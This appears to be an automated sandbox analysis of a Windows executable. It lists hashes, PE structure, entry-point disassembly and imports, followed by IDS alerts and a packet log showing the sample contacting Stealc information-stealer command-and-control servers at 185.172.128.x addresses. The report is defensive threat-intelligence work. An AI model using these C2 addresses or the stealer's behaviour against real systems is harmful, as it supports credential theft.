                                                                                                                                                                                                                                                                                      MD5:71ef0fb3be89dc92fcbe7a6e8e6d6ee8
                                                                                                                                                                                                                                                                                      SHA1:07b90b69d37fceed0e01a9eab109e62652d9c39d
                                                                                                                                                                                                                                                                                      SHA256:a464f8ca48e3193c3c58bec992d90875712d87a0165c24568e0b09c700364154
                                                                                                                                                                                                                                                                                      SHA512:cfcc9444f5f35ed3904955d3d24fe9d9ab3ce975fbdd62adb0035cf3e148f4a7c079b4b9305d89cd62c5e9528a1cfc621fcf15d5e7efa68417c24bfdfdb4a91a
                                                                                                                                                                                                                                                                                      SSDEEP:6144:dYGgupEJ12YQcP55RYd85n4roeyk5FNP0Pz1BHF+hzxYaE1ccl:dYGgupEJ1brP5si5Iyk5wXQYnBl
                                                                                                                                                                                                                                                                                      TLSH:2DA4C00372F0AC60E5622A319F2BB69C669FFD51DE11572B2E08610F66703E0F6A375D
                                                                                                                                                                                                                                                                                      Icon Hash:492951455555510d
                                                                                                                                                                                                                                                                                      Entrypoint:0x403945
                                                                                                                                                                                                                                                                                      Entrypoint Section:.text
                                                                                                                                                                                                                                                                                      Digitally signed:false
                                                                                                                                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                                                                                                                                      Subsystem:windows gui
                                                                                                                                                                                                                                                                                      Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                                                                      DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                                                      Time Stamp:0x6473CDB1 [Sun May 28 21:54:57 2023 UTC]
                                                                                                                                                                                                                                                                                      TLS Callbacks:
                                                                                                                                                                                                                                                                                      CLR (.Net) Version:
                                                                                                                                                                                                                                                                                      OS Version Major:5
                                                                                                                                                                                                                                                                                      OS Version Minor:1
                                                                                                                                                                                                                                                                                      File Version Major:5
                                                                                                                                                                                                                                                                                      File Version Minor:1
                                                                                                                                                                                                                                                                                      Subsystem Version Major:5
                                                                                                                                                                                                                                                                                      Subsystem Version Minor:1
                                                                                                                                                                                                                                                                                      Import Hash:c9619f19f41ef1b7d232f47cfbcc330b
                                                                                                                                                                                                                                                                                      Instruction
                                                                                                                                                                                                                                                                                      call 00007F65558AF412h
                                                                                                                                                                                                                                                                                      jmp 00007F65558AB395h
                                                                                                                                                                                                                                                                                      push 00000014h
                                                                                                                                                                                                                                                                                      push 00414DE8h
                                                                                                                                                                                                                                                                                      call 00007F65558ABFBAh
                                                                                                                                                                                                                                                                                      call 00007F65558ADB2Bh
                                                                                                                                                                                                                                                                                      movzx esi, ax
                                                                                                                                                                                                                                                                                      push 00000002h
                                                                                                                                                                                                                                                                                      call 00007F65558AF3A5h
                                                                                                                                                                                                                                                                                      pop ecx
                                                                                                                                                                                                                                                                                      mov eax, 00005A4Dh
                                                                                                                                                                                                                                                                                      cmp word ptr [00400000h], ax
                                                                                                                                                                                                                                                                                      je 00007F65558AB396h
                                                                                                                                                                                                                                                                                      xor ebx, ebx
                                                                                                                                                                                                                                                                                      jmp 00007F65558AB3C5h
                                                                                                                                                                                                                                                                                      mov eax, dword ptr [0040003Ch]
                                                                                                                                                                                                                                                                                      cmp dword ptr [eax+00400000h], 00004550h
                                                                                                                                                                                                                                                                                      jne 00007F65558AB37Dh
                                                                                                                                                                                                                                                                                      mov ecx, 0000010Bh
                                                                                                                                                                                                                                                                                      cmp word ptr [eax+00400018h], cx
                                                                                                                                                                                                                                                                                      jne 00007F65558AB36Fh
                                                                                                                                                                                                                                                                                      xor ebx, ebx
                                                                                                                                                                                                                                                                                      cmp dword ptr [eax+00400074h], 0Eh
                                                                                                                                                                                                                                                                                      jbe 00007F65558AB39Bh
                                                                                                                                                                                                                                                                                      cmp dword ptr [eax+004000E8h], ebx
                                                                                                                                                                                                                                                                                      setne bl
                                                                                                                                                                                                                                                                                      mov dword ptr [ebp-1Ch], ebx
                                                                                                                                                                                                                                                                                      call 00007F65558ABE3Ch
test eax, eax
jne 00007F65558AB39Ah
push 0000001Ch
call 00007F65558AB471h
pop ecx
call 00007F65558AEFA3h
test eax, eax
jne 00007F65558AB39Ah
push 00000010h
call 00007F65558AB460h
pop ecx
call 00007F65558AD874h
and dword ptr [ebp-04h], 00000000h
call 00007F65558AD174h
test eax, eax
jns 00007F65558AB39Ah
push 0000001Bh
call 00007F65558AB446h
pop ecx
call dword ptr [0040F0C4h]
mov dword ptr [04046868h], eax
call 00007F65558AF3F9h
mov dword ptr [00455820h], eax
call 00007F65558AEFF6h
test eax, eax
jns 00007F65558AB39Ah
Programming Language:
• [ASM] VS2013 build 21005
• [ C ] VS2013 build 21005
• [C++] VS2013 build 21005
• [IMP] VS2008 SP1 build 30729
• [RES] VS2013 build 21005
• [LNK] VS2013 UPD5 build 40629
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x151fc | 0x50 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x3c47000 | 0x22069 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0xf1f0 | 0x38 | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x14798 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0xf000 | 0x18c | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0xdde3 | 0xde00 | 15b07b85bcd9520d4f37fdd0be763da8 | False | 0.6055567286036037 | data | 6.704408972550424 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0xf000 | 0x6b20 | 0x6c00 | 148298c80b94a7d27eb0460d57fb10ca | False | 0.3941333912037037 | data | 4.804310456243546 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x16000 | 0x3c30880 | 0x3f800 | b551e695ab88d39c5abb037711c2fff2 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x3c47000 | 0x22069 | 0x22200 | 4b3ed349a7712de61b75308f83845ecd | False | 0.4784655448717949 | data | 5.5474239505686285 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x3c47a18 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | Romanian | Romania | 0.48587420042643925
RT_ICON | 0x3c488c0 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | Romanian | Romania | 0.5974729241877257
RT_ICON | 0x3c49168 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors | Romanian | Romania | 0.6463133640552995
RT_ICON | 0x3c49830 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | Romanian | Romania | 0.634393063583815
RT_ICON | 0x3c49d98 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216 | Romanian | Romania | 0.39097510373443983
RT_ICON | 0x3c4c340 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096 | Romanian | Romania | 0.5079737335834896
RT_ICON | 0x3c4d3e8 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2304 | Romanian | Romania | 0.5848360655737705
RT_ICON | 0x3c4dd70 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024 | Romanian | Romania | 0.675531914893617
RT_ICON | 0x3c4e1d8 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | Romanian | Romania | 0.5676972281449894
RT_ICON | 0x3c4f080 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | Romanian | Romania | 0.5469314079422383
RT_ICON | 0x3c4f928 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | Romanian | Romania | 0.6184971098265896
RT_ICON | 0x3c4fe90 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | Romanian | Romania | 0.4619294605809129
RT_ICON | 0x3c52438 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | Romanian | Romania | 0.4896810506566604
RT_ICON | 0x3c534e0 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 0 | Romanian | Romania | 0.4934426229508197
RT_ICON | 0x3c53e68 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | Romanian | Romania | 0.4521276595744681
RT_ICON | 0x3c542d0 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | Romanian | Romania | 0.4163113006396588
RT_ICON | 0x3c55178 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | Romanian | Romania | 0.4657039711191336
RT_ICON | 0x3c55a20 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 0 | Romanian | Romania | 0.5697004608294931
RT_ICON | 0x3c560e8 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | Romanian | Romania | 0.4624277456647399
RT_ICON | 0x3c56650 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | Romanian | Romania | 0.4640041493775934
RT_ICON | 0x3c58bf8 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | Romanian | Romania | 0.4831144465290807
RT_ICON | 0x3c59ca0 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 0 | Romanian | Romania | 0.5004098360655738
RT_ICON | 0x3c5a628 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | Romanian | Romania | 0.5567375886524822
RT_ICON | 0x3c5aa90 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | Romanian | Romania | 0.4928038379530917
RT_ICON | 0x3c5b938 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | Romanian | Romania | 0.4648014440433213
RT_ICON | 0x3c5c1e0 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | Romanian | Romania | 0.44508670520231214
RT_ICON | 0x3c5c748 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | Romanian | Romania | 0.27645228215767637
RT_ICON | 0x3c5ecf0 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | Romanian | Romania | 0.28728893058161353
RT_ICON | 0x3c5fd98 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 0 | Romanian | Romania | 0.30655737704918035
RT_ICON | 0x3c60720 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | Romanian | Romania | 0.3351063829787234
RT_ICON | 0x3c60b88 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | Romanian | Romania | 0.39019189765458423
RT_ICON | 0x3c61a30 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | Romanian | Romania | 0.5703971119133574
RT_ICON | 0x3c622d8 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors | Romanian | Romania | 0.5910138248847926
RT_ICON | 0x3c629a0 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | Romanian | Romania | 0.5274566473988439
RT_ICON | 0x3c62f08 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | Romanian | Romania | 0.5145228215767634
RT_ICON | 0x3c654b0 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | Romanian | Romania | 0.5841932457786116
RT_ICON | 0x3c66558 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2400 | Romanian | Romania | 0.5762295081967214
RT_ICON | 0x3c66ee0 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | Romanian | Romania | 0.6374113475177305
RT_STRING | 0x3c67348 | 0x3ec | data | Romanian | Romania | 0.4601593625498008
RT_STRING | 0x3c67734 | 0x4b6 | data | Romanian | Romania | 0.44859038142620233
RT_STRING | 0x3c67bec | 0x18e | data | Romanian | Romania | 0.5175879396984925
RT_STRING | 0x3c67d7c | 0x4a2 | data | Romanian | Romania | 0.43844856661045534
RT_STRING | 0x3c68220 | 0x59c | data | Romanian | Romania | 0.4449860724233983
RT_STRING | 0x3c687bc | 0x230 | data | Romanian | Romania | 0.49107142857142855
RT_GROUP_ICON | 0x3c689ec | 0x68 | data | Romanian | Romania | 0.7115384615384616
RT_GROUP_ICON | 0x3c68a54 | 0x76 | data | Romanian | Romania | 0.6610169491525424
RT_GROUP_ICON | 0x3c68acc | 0x76 | data | Romanian | Romania | 0.6694915254237288
RT_GROUP_ICON | 0x3c68b44 | 0x76 | data | Romanian | Romania | 0.6694915254237288
                                                                                                                                                                                                                                                                                      RT_GROUP_ICON0x3c68bbc0x68dataRomanianRomania0.7211538461538461
                                                                                                                                                                                                                                                                                      RT_VERSION0x3c68c240x1e4data0.5371900826446281
                                                                                                                                                                                                                                                                                      RT_MANIFEST0x3c68e080x261XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (549), with CRLF line terminators0.5451559934318555
DLL | Import
KERNEL32.dll | LocalCompact, GetUserDefaultLCID, AddConsoleAliasW, CreateHardLinkA, GetTickCount, EnumTimeFormatsW, GetUserDefaultLangID, FindResourceExA, GetVolumeInformationA, GetLocaleInfoW, GetCompressedFileSizeA, MultiByteToWideChar, GetTempPathW, SetThreadLocale, ChangeTimerQueueTimer, SetLastError, GetProcAddress, FindFirstChangeNotificationW, BuildCommDCBW, LoadLibraryA, WriteConsoleA, InterlockedExchangeAdd, LocalAlloc, SetCalendarInfoW, GetExitCodeThread, RemoveDirectoryW, AddAtomA, SetNamedPipeHandleState, GlobalFindAtomW, GetModuleFileNameA, GetOEMCP, GlobalUnWire, LoadLibraryExA, ReadConsoleInputW, GetWindowsDirectoryW, AddConsoleAliasA, SetFileAttributesA, GetComputerNameA, WriteConsoleW, GetStringTypeW, GetLastError, HeapFree, EncodePointer, DecodePointer, ExitProcess, GetModuleHandleExW, WideCharToMultiByte, GetCommandLineA, RaiseException, RtlUnwind, IsProcessorFeaturePresent, IsDebuggerPresent, HeapAlloc, GetProcessHeap, HeapSize, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, GetFileType, DeleteCriticalSection, GetStartupInfoW, CloseHandle, UnhandledExceptionFilter, SetUnhandledExceptionFilter, InitializeCriticalSectionAndSpinCount, Sleep, GetCurrentProcess, TerminateProcess, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetModuleHandleW, WriteFile, GetModuleFileNameW, LoadLibraryExW, IsValidCodePage, GetACP, GetCPInfo, GetCurrentThreadId, QueryPerformanceCounter, GetCurrentProcessId, GetSystemTimeAsFileTime, GetEnvironmentStringsW, FreeEnvironmentStringsW, HeapReAlloc, LCMapStringW, GetConsoleCP, GetConsoleMode, SetFilePointerEx, SetStdHandle, FlushFileBuffers, OutputDebugStringW, CreateFileW
ADVAPI32.dll | DeregisterEventSource
WINHTTP.dll | WinHttpConnect
Language of compilation system | Country where language is spoken | Map
Romanian | Romania
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
04/23/24-09:28:00.837763 | TCP | 2044243 | ET TROJAN [SEKOIA.IO] Win32/Stealc C2 Check-in | 49708 | 80 | 192.168.2.5 | 185.172.128.76
04/23/24-09:28:01.224150 | TCP | 2044244 | ET TROJAN Win32/Stealc Requesting browsers Config from C2 | 49708 | 80 | 192.168.2.5 | 185.172.128.76
04/23/24-09:28:01.851964 | TCP | 2051831 | ET TROJAN Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 | 80 | 49708 | 185.172.128.76 | 192.168.2.5
04/23/24-09:28:01.539793 | TCP | 2044246 | ET TROJAN Win32/Stealc Requesting plugins Config from C2 | 49708 | 80 | 192.168.2.5 | 185.172.128.76
04/23/24-09:27:56.592477 | TCP | 2856233 | ETPRO TROJAN Win32/Unknown Loader Related Activity (GET) | 49705 | 80 | 192.168.2.5 | 185.172.128.90
04/23/24-09:28:01.538180 | TCP | 2051828 | ET TROJAN Win32/Stealc Active C2 Responding with browsers Config M1 | 80 | 49708 | 185.172.128.76 | 192.168.2.5
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.416686058 CEST4970780192.168.2.5185.172.128.59
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.416686058 CEST4970780192.168.2.5185.172.128.59
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.416692972 CEST8049707185.172.128.59192.168.2.5
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.416709900 CEST8049707185.172.128.59192.168.2.5
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.416724920 CEST4970780192.168.2.5185.172.128.59
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.416750908 CEST8049707185.172.128.59192.168.2.5
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.416768074 CEST8049707185.172.128.59192.168.2.5
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.416783094 CEST8049707185.172.128.59192.168.2.5
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.416796923 CEST4970780192.168.2.5185.172.128.59
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.416800022 CEST8049707185.172.128.59192.168.2.5
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.416816950 CEST8049707185.172.128.59192.168.2.5
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.416819096 CEST4970780192.168.2.5185.172.128.59
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.416835070 CEST8049707185.172.128.59192.168.2.5
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.416851997 CEST8049707185.172.128.59192.168.2.5
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.416866064 CEST4970780192.168.2.5185.172.128.59
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.416867018 CEST8049707185.172.128.59192.168.2.5
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.416884899 CEST8049707185.172.128.59192.168.2.5
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.416886091 CEST4970780192.168.2.5185.172.128.59
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.416902065 CEST8049707185.172.128.59192.168.2.5
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.416909933 CEST4970780192.168.2.5185.172.128.59
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.416919947 CEST8049707185.172.128.59192.168.2.5
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.416937113 CEST8049707185.172.128.59192.168.2.5
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.416950941 CEST8049707185.172.128.59192.168.2.5
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.416951895 CEST4970780192.168.2.5185.172.128.59
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.416968107 CEST8049707185.172.128.59192.168.2.5
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.416985035 CEST8049707185.172.128.59192.168.2.5
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.417000055 CEST4970780192.168.2.5185.172.128.59
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.417001963 CEST8049707185.172.128.59192.168.2.5
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.417020082 CEST8049707185.172.128.59192.168.2.5
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.417032957 CEST4970780192.168.2.5185.172.128.59
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.417036057 CEST8049707185.172.128.59192.168.2.5
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.417052984 CEST8049707185.172.128.59192.168.2.5
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.417068005 CEST8049707185.172.128.59192.168.2.5
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.417073011 CEST4970780192.168.2.5185.172.128.59
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.417073011 CEST4970780192.168.2.5185.172.128.59
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.417084932 CEST8049707185.172.128.59192.168.2.5
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.417109966 CEST8049707185.172.128.59192.168.2.5
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.417124987 CEST8049707185.172.128.59192.168.2.5
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.417134047 CEST4970780192.168.2.5185.172.128.59
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.417141914 CEST8049707185.172.128.59192.168.2.5
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.417160034 CEST8049707185.172.128.59192.168.2.5
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.417172909 CEST4970780192.168.2.5185.172.128.59
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.417176008 CEST8049707185.172.128.59192.168.2.5
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.417192936 CEST8049707185.172.128.59192.168.2.5
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.417208910 CEST8049707185.172.128.59192.168.2.5
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.417217970 CEST4970780192.168.2.5185.172.128.59
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.417241096 CEST4970780192.168.2.5185.172.128.59
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.417288065 CEST4970780192.168.2.5185.172.128.59
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.619967937 CEST8049707185.172.128.59192.168.2.5
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.620021105 CEST8049707185.172.128.59192.168.2.5
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.620037079 CEST8049707185.172.128.59192.168.2.5
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.620134115 CEST8049707185.172.128.59192.168.2.5
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.620151043 CEST4970780192.168.2.5185.172.128.59
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.620156050 CEST8049707185.172.128.59192.168.2.5
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.620172024 CEST8049707185.172.128.59192.168.2.5
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.620187044 CEST8049707185.172.128.59192.168.2.5
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.620203972 CEST8049707185.172.128.59192.168.2.5
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.620218992 CEST4970780192.168.2.5185.172.128.59
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.620220900 CEST8049707185.172.128.59192.168.2.5
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.620218992 CEST4970780192.168.2.5185.172.128.59
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.620239019 CEST8049707185.172.128.59192.168.2.5
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.620245934 CEST4970780192.168.2.5185.172.128.59
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.620256901 CEST8049707185.172.128.59192.168.2.5
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.620265961 CEST8049707185.172.128.59192.168.2.5
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.620281935 CEST8049707185.172.128.59192.168.2.5
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.620297909 CEST8049707185.172.128.59192.168.2.5
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.620304108 CEST4970780192.168.2.5185.172.128.59
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.620312929 CEST8049707185.172.128.59192.168.2.5
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.620330095 CEST8049707185.172.128.59192.168.2.5
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.620342016 CEST4970780192.168.2.5185.172.128.59
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.620345116 CEST8049707185.172.128.59192.168.2.5
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.620362997 CEST8049707185.172.128.59192.168.2.5
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.620372057 CEST4970780192.168.2.5185.172.128.59
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.620379925 CEST8049707185.172.128.59192.168.2.5
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.620395899 CEST8049707185.172.128.59192.168.2.5
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.620410919 CEST4970780192.168.2.5185.172.128.59
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.620412111 CEST8049707185.172.128.59192.168.2.5
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.620429039 CEST8049707185.172.128.59192.168.2.5
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.620444059 CEST4970780192.168.2.5185.172.128.59
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.620445013 CEST8049707185.172.128.59192.168.2.5
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.620460987 CEST8049707185.172.128.59192.168.2.5
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.824407101 CEST8049707185.172.128.59192.168.2.5
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.824408054 CEST4970780192.168.2.5185.172.128.59
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.824423075 CEST8049707185.172.128.59192.168.2.5
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.824445963 CEST8049707185.172.128.59192.168.2.5
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.824448109 CEST4970780192.168.2.5185.172.128.59
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.824461937 CEST8049707185.172.128.59192.168.2.5
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.824469090 CEST4970780192.168.2.5185.172.128.59
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.824480057 CEST8049707185.172.128.59192.168.2.5
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.824496984 CEST8049707185.172.128.59192.168.2.5
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.824512005 CEST8049707185.172.128.59192.168.2.5
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.824512959 CEST4970780192.168.2.5185.172.128.59
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.824527979 CEST8049707185.172.128.59192.168.2.5
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.824543953 CEST8049707185.172.128.59192.168.2.5
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.824546099 CEST4970780192.168.2.5185.172.128.59
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.824559927 CEST8049707185.172.128.59192.168.2.5
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.824568987 CEST4970780192.168.2.5185.172.128.59
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.824577093 CEST8049707185.172.128.59192.168.2.5
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.824593067 CEST8049707185.172.128.59192.168.2.5
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.824609041 CEST8049707185.172.128.59192.168.2.5
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.824631929 CEST8049707185.172.128.59192.168.2.5
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.824636936 CEST4970780192.168.2.5185.172.128.59
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.824636936 CEST4970780192.168.2.5185.172.128.59
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.824650049 CEST8049707185.172.128.59192.168.2.5
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.824667931 CEST8049707185.172.128.59192.168.2.5
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.824682951 CEST8049707185.172.128.59192.168.2.5
